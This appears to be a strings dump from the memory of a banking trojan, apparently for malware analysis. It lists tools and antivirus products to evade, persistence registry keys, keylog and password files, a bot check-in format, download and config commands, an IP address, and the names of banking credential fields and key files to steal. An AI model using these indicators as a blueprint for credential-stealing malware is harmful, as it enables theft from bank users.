multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
http://
http://
https://
https://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: http://www.google.com
Referer: http://www.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
www.bing.com
www.bing.com
www.microsoft.com
www.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;<=
?456789:;<=
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_1200_rwx_00D10000_0006A000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
<>http
<>http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
http://
http://
https://
https://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: http://www.google.com
Referer: http://www.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
www.bing.com
www.bing.com
www.microsoft.com
www.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;<=
?456789:;<=
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
LOCALSERVICE!XP3!F9BE9A8A
LOCALSERVICE!XP3!F9BE9A8A
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.ffffff00
MSCTF.Shared.MUTEX.ffffff00
%Documents and Settings%\LocalService\Application Data\
%Documents and Settings%\LocalService\Application Data\
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\